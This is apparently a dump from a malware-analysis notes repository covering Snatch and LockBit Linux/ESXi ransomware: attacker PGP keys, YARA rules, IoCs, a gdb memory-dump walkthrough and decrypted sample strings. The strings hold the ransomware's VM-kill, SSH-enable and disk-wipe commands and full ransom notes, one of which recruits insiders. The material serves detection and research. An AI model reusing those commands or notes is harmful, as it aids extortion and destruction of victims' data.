2mIBEvC+0MiBCk1mIqfR3dqyjiyWP2gbn1jvZuKdgLnrFATMWwfFWkR8LFT9yaZw 183 | lNZ7QXVP42sHr61ZoArc0VExfL/DnpfAZI2w05DUcSeI0fTGR5jT/QZ+Pty4pVu8 184 | FAyOAL3SMhEzxj0M/P/5i/ZfH9uXSHuyxkA3ABEBAAG0FGdwaXJmYWhsb3V3ZGpj 185 | eG1uZXpiiQFUBBMBCAA+FiEEAr2nqlfJey8vDYU7cT+CKj7ZscEFAlzOpcICGwMF 186 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQcT+CKj7ZscH67ggAp2wL 187 | 
A1R7XfmaxHfwpNGjcLZKGkXT4JFwJ9Y7bDHUNU/8JQmM2JXkMPxsmW+2L9Dc10Tp 188 | U6VWHnAazzVRmXDaD5bh2IGukR9AmoYh9vmXgt6sDnwsowk06/xUmtnjOHM/9Iob 189 | Ezgw1yK0Oizs1Jv3SbuwuyafuMhQQCvbPhHKpuo8IXJyBW7fY495rUPz86krODZR 190 | jE7b3ebEHrTSXfbzXiYWcFKYyaYTLqcjr1KzAiHM0djRcb/UpI/oulowF+iOy5v/ 191 | HjD521KsBDcZ/sUxY57jLyvyJY0DH9UwvS0gzcc5U0nVkKWJPy0Kgl2dnboOchMX 192 | KX+0gJkBGIvSEe+7m7kBDQRczqXCAQgAsECvMybub0TWtlpwnCSP0d/JV0mOrG/i 193 | qtOWlHH+fxfgUFWLSTfAg39/2sNmz4nP+lMpNdz90vxcDwOv33Ul6OCebVDE/kHq 194 | NaZM2IEeUY/iGlvQZoWX1QLHhjDoQMMdvruZFozlthOZDqA6J+2XM6vID/qwz7UY 195 | O6gTJVBWCgb42yc0CxvGNEGFmi4fM46P2BLbx2+GReIRGs5NFB04hjpTlzGAELXn 196 | 4aFLToA7iW4j1CKrOhVIef/FDeuSnf239Dbg/vXp70E/wKTgthv2qf7Yb9GEAvI1 197 | +G8Kj+GuZaRGEfHNxjjI+0emhx6C4OlGGyIMZ+ImGXrm8theg4gpPQARAQABiQE2 198 | BBgBCAAgFiEEAr2nqlfJey8vDYU7cT+CKj7ZscEFAlzOpcICGwwACgkQcT+CKj7Z 199 | scGnvwf/fZuxldvO/tgHMv6SUsM0qQ9FO0r4gvqHjeTxq2vG/pOsZ+bweGG8XS0b 200 | bB5OtMOY+ipFDrHXiWk1Zwe4ck+8LUAIkuwvGCJfom7FCe6tmYBMXpkNWv0Do8W9 201 | IeQjyHfawClmM6Rm91UDm/9xHHCUCe7DKGe/QjHaRysfXuuKrWN/o+FROeEn3eu4 202 | BXTWmmHuc09VcqtnjRpiDRSgKjKm/nR51MjOds+M7E/ESdHWLx1/JQT02vYs5jfU 203 | n65Dcbbvo7BdIbRiuR/RMPYEj/t1YGCVLaAP6yQAa5DdXWAFDoUiocn7fXxnWIwc 204 | Y3Xkzp1of0332FAFWuriZUj6dCL7HQ== 205 | =xibY 206 | -----END PGP PUBLIC KEY BLOCK----- 207 | ``` 208 | 209 | ```pgp 210 | -----BEGIN PGP PUBLIC KEY BLOCK----- 211 | mQENBFzKqdsBCADT/Qah/29i6qTfHYEa9WGdC04/KV8w6tYH1G6fAFAK9gRSWdbG 212 | 1JWiipNmpOYkJG4BXSPo/J1ppP5L3CHY0fwk0yAkyGPjNtbiHJxFJ1/MBeQOmKJe 213 | //4mSDwgdBGxh8cqodbAiWYGVmiDurCtRypoKipfcx1lI1+0DPnNuK7qY6U1Wnel 214 | UEZpiyyHLiidCCy+MJoDj0jPxhu3nLzdCwKsOfLA91+nf1fqzlIjw/AXvIieh+ye 215 | KhTACsROqlbBoXc+YtLsJ+o/tugtmpy+f4MYSKnlEaYQ+/nxc4hefoPVwlgK9Ei1 216 | L8qOwezwYDvBubCCTDxiyIOXnVOB7XH+ifdzABEBAAG0FHdlb2lxa3NyeWpidnBo 217 | ZmRnY3R4iQFUBBMBCAA+FiEEK0PX/7RtDECqmQX4CixyEGMJDEIFAlzKqdsCGwMF 218 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQCixyEGMJDELDdwf/dQcU 219 | 
CrVJEQphqnfuktTimIHQR0CqYOlUddBPJoV9l1fBJtItgkLjImkoOxqLERZcOgXi 220 | 6h83nCXPaDK2Ssj4nSTigjoyQ9HJpYZYVZoZpqtDh5K1OMSrREtB2Zu/Np47dl+6 221 | eDNfnUidpzLa0bGZotyy8086DtmizjIGo5JZ89MjqHZLQH4iX2oSuV01MW2tCUwM 222 | RkQ2WEKzDYCR2J+ZYKXzDQkZAXmqdDFTp6OGa/HQy2XMBmIy2aFyrDTW1vuXJbK7 223 | uL0wYR48pW/1N7MaC6QWjag/Nb5i4eRQOcFTIiiG/UueH+3sbr5okE12hpDYZ1vC 224 | uN4VWj1Ljh/Y4Jv8R7kBDQRcyqnbAQgAodQaV4rcRfEKjAqy5CXXnqN40J9fYDD+ 225 | 9Tz0j3qQhRUb9Q22n7zXll+869+m4fkiSohYA5FOfeAfG5n3TPk37GJs0MlzTNB/ 226 | FpkElXFVZgDtV/E/VmEqK+2lYCFyVkw/RJczUqRC+vhRU8TLWeEdEAhYQ0P/N6dl 227 | u8I+jsDl5U+fUQm0KuIS+qOfRuoiocs2YKQYq7rIW8i07iCYTDpKeImnwrvVy9Zt 228 | M0Op6j6RGQgAzMqI5DDTRBxkpTK+E80K14BcaQ9l2Ql9BfonJoxFXEEQ44RhfTUj 229 | 90kaAKAcueGvx81E91SPkr3brvk8/gwOkQ1rdY905I9E/9uyt6WNoQARAQABiQE2 230 | BBgBCAAgFiEEK0PX/7RtDECqmQX4CixyEGMJDEIFAlzKqdsCGwwACgkQCixyEGMJ 231 | DEJgEQgAwYi25R5JDTbgrdas6JIZE5tPvHf+CydiAEmDq22zXehiiw3wU3W0iLMs 232 | 7Dy+yj5q0dC+Pfhzgq10Pz/Td7OtrrKzvg5rS9EBLHv0hs0t2RuuSRfM62P/fCXi 233 | VLQh08B5sC8eRIMQzYfRWzsOfN5BEzj1gOtsOBE04f9hTFZ/N7K6Gx4q428qGmgC 234 | 12q8/tc7wcsiHX1lEB6JDekDT5IdJcwoxs2t87J1Z3xlIvgpSsAPzNpG4nRQtCVW 235 | uvuaCpWfdSElTLR4s+4TM/qUxpslNA+DP0eelxxD8RQcsDK86A6FLo/f7jsuGrL4 236 | jIxAezZQinBjO0XTmJ+az+O00taMzw== 237 | =nrqZ 238 | -----END PGP PUBLIC KEY BLOCK----- 239 | ``` 240 | 241 | ```pgp 242 | -----BEGIN PGP PUBLIC KEY BLOCK----- 243 | mQENBFyf7BEBCAC3g5OV6UoyNHtnSBPMaIJ26yIqamQ9CAloQpQ1oSfXEqPcyA7g 244 | aO59x/8zDx4PjiDHJ8/4XUM7ac89ltCP6Or9NUMkpXmidBbHWCQCkMZf81nVWoZ5 245 | 1l1ZIyM+vJd4JM84vSXF07j+b0K2/3Kwx1K8g4Y2Qqb0D6tEdONTAOkcqtDud9Zz 246 | MMZ9LCEHjae3eK+gb+Jh212FI8wE9lXaE1smqn4eBkrcFw2ERYAyeCs1adcE58T5 247 | vuaTmXENduZagrXVtCPK8SU4fZqNclQdBThfigIkBoWgxiIVbR6lDSyVgXKzy3te 248 | 8lXxiDFodYw4DQzoipqpEvaCM1G5JCrgxQATABEBAAG0FGJmaGppcHN3b25sZHZ1 249 | ZXRna3JtiQFUBBMBCAA+FiEEm3aObQRnB968nKMYU0780NYNOE0FAlyf7BECGwMF 250 | CQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQU0780NYNOE3IdQgAh7l4 251 | 
NmPg7RZf4cqF36nZXQtxoNh08mQ6RrNn/ADQrgzgMP9K25jNYxqmVHrkQYzXUhRO 252 | KMeBSncvRfAF0KHRsMNgSwG7tAV/k+otVw6i5Q3A6MpN12DZ6PXMIDn26FArUn5B 253 | iQywi29i1jd0GPLLYQRMVGDhr8PO+zRM/mSUDLyRY2/yK1fMpaIko8xTHhsEuh1D 254 | n6W/qU8xpP6UtcZeclNrAhqHup7l1MkJ9jSrI4qTrhNGqj3vSKcKcU0TgD21pejz 255 | 7KBHSVPccbj1S/rtQFt+sWK/EKSA26eutzGv2840Ft/ajArNrpYR5pZFJy+MLl1b 256 | w3Jsmcf19NQf9X77DbkBDQRcn+wRAQgAwYeSIuSv3MsMIZbwre4wzgA0ycPrWULV 257 | ZQFCzqh7+A12rLM6Ln6x2MakQZf/tUBW1vFHFn8EKXL9WJXlmFQ1slEy0gAG5RPT 258 | 4yrAkHCArXiQZTtzqcfT/X0gIyQyUVUPK9GcnTGpppwSzNfdGBRwUAZFGv+0SBUM 259 | drQvZ+gNDEGzW/dcPcOqVUhNG71PMtH1MVEzDuCHadPLLzTonK3sflNde2rFtW5e 260 | Vq6X21kyu+lVxNiXsPvqB15qYbmqW8OhuWDrP5m6ZCPo7hApQiyK5990G2RqdoD9 261 | U6xW4PmDDzT5FuxeCZ8I8zE0kMLvYUl5w4k87AX6lSe9hn05QMEQowARAQABiQE2 262 | BBgBCAAgFiEEm3aObQRnB968nKMYU0780NYNOE0FAlyf7BECGwwACgkQU0780NYN 263 | OE2LPQf/WlGZgin6CVYSAHrhB9LWK+lgmrufk8Ju39Q7fTSwVqFZCK7d21rwh+9J 264 | TRBlmy5u7Zj+mkgVBwv6V+Qy5d03OSxxIi658v1w6n4guneYfabUWGvUhnVH5s73 265 | R6gwh9b22qgfv6StbqL0kMT77TCcNVyCuD80r7J0INW7YsdFDB2LmrTTHO6yFMWT 266 | JITMt82UWw9AgRAwn/7uXzErcUAvu5TffjC5b25VQNmRLZqgL3kC3j+XgFevvJC8 267 | wnzm/yfaG3IYdQWYJSstW+PeUiHN42fq45QG9QzdauVJqQwIH96ilJZVbFrXf2b1 268 | tbBY6O1dizLZOJGfSFDRQ+VcN7/qBw== 269 | =PEdT 270 | -----END PGP PUBLIC KEY BLOCK----- 271 | ``` 272 | 273 | ## Yara rules 274 | ```yara 275 | rule snatch_caro 276 | { 277 | condition: 278 | new_file and ((signatures matches /.*Snatch.*/) or (signatures matches /.*Ransom.*Gocoder.*/)) 279 | } 280 | ``` 281 | 282 | ```yara 283 | import "cuckoo" 284 | rule snatch_service 285 | { 286 | condition: 287 | cuckoo.registry.key_access(/\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SuperBackupMan/) 288 | or 289 | cuckoo.registry.key_access(/HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SuperBackupMan/) 290 | or 291 | cuckoo.registry.key_access(/HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SuperBackupMan/) 292 | } 293 | ``` 294 | 295 | ## 
Ransom note 296 | ``` 297 | Your all your files are encrypted and only I can decrypt them. 298 | Contact me: 299 | doctor666@mail.fr or doctor666@cock.li 300 | Write me if you want to return your files - I can do it very quickly 301 | The header of the letter must contain the extension of the encryptor. 302 | Attention 303 | Do not rename encrypted files. You may have permanent data loss. 304 | To prove that I can recover your files, I am ready to decrypt any three files (less than 1Mb) for free (except databases, Excel and backups) 305 | hurry up 306 | If you do not email me in the next 48 hours then your data may be lost permanently 307 | ``` 308 | -------------------------------------------------------------------------------- /Ransomware-Linux-Lockbit/README.md: -------------------------------------------------------------------------------- 1 | # Dumping plain-text strings from the Linux-ESXi variant of Lockbit ransomware 2 | 3 | ## Discovered by Trend Micro 4 | ```Bash 5 | https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html 6 | ``` 7 | 8 | ## SHA256 9 | ```Bash 10 | f3a1576837ed56bcf79ff486aadf36e78d624853e9409ec1823a6f46fd0143ea 11 | 67df6effa1d1d0690c0a7580598f6d05057c99014fcbfe9c225faae59b9a3224 12 | ee3e03f4510a1a325a06a17060a89da7ae5f9b805e4fe3a8c78327b9ecae84df 13 | ``` 14 | 15 | ## Executing the ransomware 16 | ```Bash 17 | sandworm@arrakis:~$ sudo ./lockbit3 18 | ``` 19 | 20 | Generally, the process will hang on read(). Tried to debug it in gdb. 21 | ```GDB 22 | (No debugging symbols found in /lib64/ld-linux-x86-64.so.2) 23 | 0x00007f15f11b9142 in __GI___libc_read (fd=0, buf=0x20b72e0, nbytes=1024) 24 | at .. /sysdeps/unix/sysv/linux/read.c:26 25 | 26 ../sysdeps/unix/sysv/linux/read.c: No such file or directory. 26 | ``` 27 | 28 | Added a bunch of deb-src repos to my /etc/apt/sources.list to apt source glibc/libc6. However that does not solve the issue. 
29 | If you try to strace the process, it will fail, because the binary itself contains two ptrace calls. 30 | ```Bash 31 | getppid() = 15885 32 | ptrace(PTRACE_ATTACH, 15885 33 | ``` 34 | 35 | Tried to circumvent this via: 36 | ```Bash 37 | /etc/sysctl.d/10-ptrace.conf: 38 | kernel.yama.ptrace_scope = 0 39 | ``` 40 | 41 | And via: 42 | ```Bash 43 | echo "0" | sudo tee /proc/sys/kernel/yama/ptrace_scope 44 | ``` 45 | 46 | No luck. 47 | The ptrace calls can be patched out of the binary, but then the process will still hang on read(). 48 | Same results on both ESXi and Ubuntu images. 49 | Went down the rabbit hole of differing glibc/libc6 versions as a cause. 50 | 51 | ```Bash 52 | sandworm@arrakis:~$ strings lockbit3 | grep -i libc 53 | libc.so.6 54 | GLIBC_2.2.5 55 | GLIBC_2.3.2 56 | GLIBC_2.3 57 | GLIBC_2.4 58 | GLIBC_2.3.4 59 | ``` 60 | 61 | My current image: 62 | ```Bash 63 | sandworm@arrakis:~$ ldd --version ldd 64 | ldd (Ubuntu GLIBC 2.31-0ubuntu3) 2.31 65 | ``` 66 | 67 | ```Bash 68 | sandworm@arrakis:~$ strings lockbit3 | grep -i libc 69 | String dump of section '.comment': 70 | [ 0] GCC: (GNU) 4.4.7 20120313 (Red Hat 4.4.7-23) 71 | ``` 72 | 73 | No conclusion. 74 | Going to try other kernels with different glibc versions later on. 
75 | 76 | ## Continuing and finding corresponding PID of the hanging process 77 | ```Java 78 | sandworm@arrakis:/tmp$ ps aux | grep -i lockb 79 | root 15884 0.0 0.1 23440 4788 pts/0 t+ 09:44 0:00 sudo ./lockbit3 -i 80 | root 15885 0.0 0.0 2888 952 pts/0 S+ 09:44 0:00 ./lockbit3 -i 81 | ``` 82 | 83 | ## Finding related memory regions 84 | ```Go 85 | sandworm@arrakis:/tmp$ sudo cat /proc/15885/maps 86 | 00400000-0043c000 r-xp 00000000 08:05 264340 /tmp/lockbit3 87 | 0063b000-0063c000 r--p 0003b000 08:05 264340 /tmp/lockbit3 88 | 0063c000-00640000 rw-p 0003c000 08:05 264340 /tmp/lockbit3 89 | 0121b000-0123c000 rw-p 00000000 00:00 0 [heap] 90 | ``` 91 | 92 | ## Dumping the memory section via gdb 93 | ```YAML 94 | sandworm@arrakis:/tmp$ sudo gdb --pid 15885 95 | GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2 96 | (gdb) dump memory /tmp/lockbit_memdump 0x0063c000 0x00640000 97 | ``` 98 | 99 | ## XOR key 100 | ```YAML 101 | 0x39 102 | ``` 103 | 104 | ## Plain-text strings 105 | ```JSON 106 | [+] file %s decrypted. 107 | [-] file %s not decrypted. 108 | /tmp/ 109 | locklog 110 | .llg 111 | lwndotfyrm:i:b:e:s:p:a:z: 112 | Usage: %s [OPTION]... -i '/path/to/crypt' 113 | Recursively crypts files in a path or by extention. 114 | Mandatory arguments to long options are mandatory for short options too. 
115 | -i, --indir path to crypt 116 | -m, --minfile minimal size of a crypted file, no less than 4096 117 | -r, --remove self remove this file after work 118 | -l, --log prints the log to the console 119 | -n, --nolog do not print the log to the file /tmp/locker.log 120 | -d, --daemonize runs a program as Unix daemon 121 | -w, --wholefile encrypts whole file 122 | -b, --beginfile encrypts first N bytes 123 | -e, --extentions encrypts files by extentions 124 | -o, --nostop prevent to stop working VM 125 | -t, --wipe wipe free space 126 | -s, --spot upper bound limitation value of spot in Mb 127 | -p, --pass password 128 | -f, --full full log 129 | -a, --delay start delay in minutes 130 | -y, --noexts do not search for extentions 131 | !!!-Restore-My-Files-!!! 132 | ~~~ LockBit 2.0 the world's fastest ransomware since 2019~~~ 133 | >>>> Your data are stolen and encrypted 134 | The data will be published on TOR website if you do not pay the ransom 135 | Links for Tor Browser: 136 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 137 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 138 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 139 | Links for the normal browser 140 | https://lockbitapt.uz 141 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 142 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 143 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 144 | >>>> What guarantees that we will not deceive you? 145 | We are not a politically motivated group and we do not need anything other than your money. 146 | 147 | If you pay, we will provide you the programs for decryption and we will delete your data. 148 | Life is too short to be sad. Be not sad, money, it is only paper. 149 | 150 | If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. 
151 | Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. 152 | 153 | You can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live 154 | 155 | >>>> You need contact us and decrypt one file for free on these TOR sites with your personal decryption ID 156 | Download and install TOR Browser https://www.torproject.org/ 157 | Write to a chat and wait for the answer, we will always answer you. 158 | Sometimes you will need to wait for our answer because we attack many companies. 159 | Links for Tor Browser: 160 | http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion 161 | http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion 162 | http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 163 | http://lockbitsapfq6mp7djlmbtk4uj53vnueldrjsgfjew3ccridkufmmmyd.onion 164 | http://lockbitsapliyedzmz5yjcoj27yfgeix6rzrhj7ss4kvfmdv6iyvxlad.onion 165 | http://lockbitsapu34zkhnafamvkegbmdfh5yvqjbth6g376z2tgvef34jnqd.onion 166 | http://lockbitsapzxzkpf33daeacsarqdtjjlkouxd7emxaqk7f3svavbmmad.onion 167 | Link for the normal browser 168 | https://lockbitsupp.uz 169 | If you do not get an answer in the chat room for a long time, the site does not work and in any other emergency, you can contact us in jabber or tox. 170 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 171 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 172 | >>>> Your personal decryption ID: 173 | >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! 174 | >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again! 175 | >>>> Advertisement 176 | Would you like to earn millions of dollars $$$ ? 
177 | Our company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. 178 | You can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. 179 | Open our letter at your email. Launch the provided virus on any computer in your company. 180 | You can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us. 181 | Companies pay us the foreclosure for the decryption of files and prevention of data leak. 182 | You can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. 183 | Using Tox messenger, we will never know your real name, it means your privacy is guaranteed. 184 | If you want to contact us, write in jabber or tox. 185 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 186 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 187 | If this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser 188 | Links for Tor Browser: 189 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 190 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 191 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 192 | Links for the normal browser 193 | https://lockbitapt.uz 194 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 195 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 196 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 197 | vm-support --listvms 198 | /bin/vim-cmd hostsvc/enable_ssh 199 | [+] ESXi: enable_ssh 200 | [-] ESXi: enable_ssh 201 | /sbin/vmdumper -l 202 | /sbin/vmdumper %d suspend_vm 203 | [+] Suspended VM ID %d 204 | 
[-] Suspend VM ID %d ERROR %d. Trying %d... 205 | /tmp/locker.pid 206 | /home 207 | /var/log 208 | %H:%M:%S 209 | [%s][%lu][+] End file %s size %lu time %lu is encrypted. Checksum after encryption %lu 210 | [%s][%lu][-] End file %s remained intact. 211 | [%s][%lu][?] File %s need ram %d 212 | [%s][%lu][-] File %s MMAP ERROR %d 213 | [%s][%lu][?] Free ram %d, need ram %d 214 | [%s][%lu][+] Start encrypting file %s spot %d from %d. Original checksum %lu 215 | [%s][%lu][+] Encrypting file %s... 216 | vmdk 217 | vswp 218 | lockbit 219 | [%s][%lu][+] Start encrypting file %s. Original checksum %lu 220 | [%s][%lu][+] Start encrypting file %s 221 | [%s][%lu][+] Encrypting file %s... 222 | /bin/vm-support 223 | /sbin/vm-support 224 | /bin/ 225 | /sbin/ 226 | /sbin/vmdumper 227 | /bin/vim-cmd 228 | [%s][%lu][+] Encrypt entry %s 229 | %02X 230 | /**/* 231 | %s/%s 232 | %*s[%s] 233 | %*s- %s 234 | [%s][%lu][+] Add directory to encrypt: %s 235 | [-] glob ERROR %d 236 | remove 237 | minfile 238 | indir 239 | nolog 240 | WVJMVI9full 241 | wholefile 242 | beginfile 243 | daemonize 244 | extensions 245 | spot 246 | wipe 247 | pass 248 | delay 249 | repeat 250 | noexts 251 | [%s][%ul][+] ------------------Start searching for extentions------------------ 252 | [%s][%ul][+] Launch parameters: %s -i '%s' -m %d -w %d -b %d -r %d -l %d -n %d -d %d -e '%s' -s %d -p %s -o %d -t %d -f %d -a %d -z %d -y %d 253 | Date: %d/%m/%Y Time: %H:%M:%S 254 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 255 | uname -a: %s%s%s 256 | Processor: %s, %d cores 257 | Volumes in the system: 258 | Virtual machines for skipping: %s 259 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 260 | Total files..................%lu 261 | Total VMs....................%lu 262 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 263 | Encrypted files..............%lu 264 | Encrypted VMs................%lu 265 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 266 | Total encrypted size.........%lu Mb 267 | Time spent for encryption....%lu sec 268 
| $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 269 | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 270 | LockBit Linux/ESXi locker V: 1.2 271 | esxcli vm process kill --type 272 | force --world-id 273 | 3}VW 274 | _VK^\M 275 | ZU\XW 276 | @VLK 277 | NVKRJIXZ\ 278 | [%s][%lu][+] %s %d 279 | Suspended VM ID 280 | [%s][%lu][-] %s %d %s %d %s %d... 281 | ERROR 282 | Trying 283 | [%s][%lu][+] %s 284 | [%s][%lu][-] %s 285 | ESXi: enable_ssh 286 | Same process is running. Exit. 287 | kill -9 `ps 288 | grep %s 289 | cut -d' ' -f0` 290 | ps -ef 291 | grep '%s' 292 | grep -v grep 293 | awk '{print $2}' 294 | xargs -r kill -9 295 | vmware -v 296 | uname -a 297 | (Running) 298 | [%s][%lu][+] Wipe partition %s 299 | [%s][%lu][+] End wiping partition %s 300 | Start wiping all partitions. 301 | All partitions have been wiped. 302 | df -h 303 | displayName = " 304 | [%s][%lu][+] VM %s will be skipped. 305 | ~~~~~~~~~~~~~~~Hardware~~~~~~~~~~~~~~~~~~ 306 | lspci -vvv 307 | vim-cmd hostsvc/autostartmanager/enable_autostart false 308 | Disabled AutoStart 309 | There are %d processors in the system. 
310 | esxcfg-scsidevs -l 311 | egrep -i 'display name 312 | vendor' 313 | Processor: %s, %d cores 314 | vim-cmd hostsvc/hostsummary 315 | grep cpuModel 316 | cut -d '"' -f2 317 | head -c -1 318 | esxcli storage filesystem list 319 | tail -n +3 320 | Enter password: 321 | ls -Ral / 322 | ls -alR /vmfs/ 323 | [%s][%lu][+] wipe error %d 324 | pciconf -lv 325 | /sbin/sysctl hw 326 | grep hw.model 327 | cut -d ':' -f2 328 | lscpu 329 | grep "Model name" 330 | cut -d ':' -f2 331 | egrep 'da[0-9] 332 | ad[0-9] 333 | cd[0-9]' /var/run/dmesg.boot 334 | lsblk -io KNAME,TYPE,SIZE,MODEL 335 | tail -n +2 336 | ps auxfww 337 | ps -TcJnN 338 | ps auxf 339 | /etc/rc.local 340 | /etc/ 341 | -i '%s' -m %d -b %d -e '%s' -s %d -p '%s' -a %d -z %d 342 | /etc/sudoers.d 343 | /usr/share 344 | a-bvmsyslogd 345 | !!!-Restore-My-Files-!!!,lockbit,locklog 346 | VMware vCenter,VMware-VirtualSAN-Witness 347 | rar,zip,7zip,txt,doc,jpg,png,mp3,vbm,vrb,vbk,vmdk,zip,msi,iso,tar,sql,vlb,vom,vsm,vsb,vab 348 | test 349 | ``` 350 | 351 | ## IoCs: 352 | ```YAML 353 | Strings: 354 | ~~~ LockBit 2.0 the world's fastest ransomware since 2019~~~ 355 | LockBit Linux/ESXi locker V: 1.2 356 | !!!-Restore-My-Files-!!! 
357 | locklog 358 | 359 | Targets: 360 | VMware vCenter 361 | VMware-VirtualSAN-Witness 362 | 363 | Added extension: 364 | .llg 365 | 366 | Extension list: 367 | rar,zip,7zip,txt,doc,jpg,png,mp3,vbm,vrb,vbk,vmdk,zip,msi,iso,tar,sql,vlb,vom,vsm,vsb,vab 368 | 369 | PID file: 370 | /tmp/locker.pid 371 | 372 | Web: 373 | https://lockbitapt.uz 374 | http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion 375 | http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion 376 | http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 377 | http://lockbitsapfq6mp7djlmbtk4uj53vnueldrjsgfjew3ccridkufmmmyd.onion 378 | http://lockbitsapliyedzmz5yjcoj27yfgeix6rzrhj7ss4kvfmdv6iyvxlad.onion 379 | http://lockbitsapu34zkhnafamvkegbmdfh5yvqjbth6g376z2tgvef34jnqd.onion 380 | http://lockbitsapzxzkpf33daeacsarqdtjjlkouxd7emxaqk7f3svavbmmad.onion 381 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 382 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 383 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 384 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 385 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 386 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 387 | 388 | Tox ID LockBitSupp: 389 | 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 390 | 391 | XMPP (Jabber) Support: 392 | 598954663666452@exploit.im 393 | 365473292355268@thesecure.biz 394 | ``` 395 | 396 | ## YARA 397 | ```C++ 398 | rule Lockbit_Linux_ESXi_memory_strings 399 | { 400 | meta: 401 | author = "Albert Zsigovits" 402 | url = "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Linux-Lockbit" 403 | strings: 404 | $str1 = " -e, --extentions encrypts files by extentions" ascii wide 405 | $str2 = "!!!-Restore-My-Files-!!!" 
ascii wide 406 | $str3 = "VMware vCenter,VMware-VirtualSAN-Witness" ascii wide 407 | $str4 = "/tmp/locker.pid" ascii wide 408 | $str5 = "locklog" ascii wide 409 | condition: 410 | 3 of them 411 | } 412 | ``` 413 | 414 | ```C++ 415 | rule Lockbit_Linux_ESXi_XOR_function 416 | { 417 | meta: 418 | author = "Albert Zsigovits" 419 | url = "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Linux-Lockbit" 420 | strings: 421 | $xor = { 0F B6 05 ?? ?? 23 00 BA ?? ?? 63 00 ?? ?? 40 00 89 C1 32 0A 88 0A 48 83 C2 01 84 C9 75 F2 } 422 | condition: 423 | $xor 424 | } -------------------------------------------------------------------------------- /Ransomware/_ransom_notes.md: -------------------------------------------------------------------------------- 1 | # ransomware-notes 2 | Ransom notes of different ransomware families 3 | 4 | ## Afrodita 5 | ``` 6 | ~~~ Greetings ~~~ 7 | [+] What has happened? [+] 8 | Your files are encrypted, and currently unavailable. You are free to check. 9 | Every file is recoverable by following our instructions below. 10 | Encryption algorithms used: AES256(CBC) + RSA2048 (military/government grade). 11 | [+] Guarantees? [+] 12 | This is our daily job. We are not here to lie to you - as 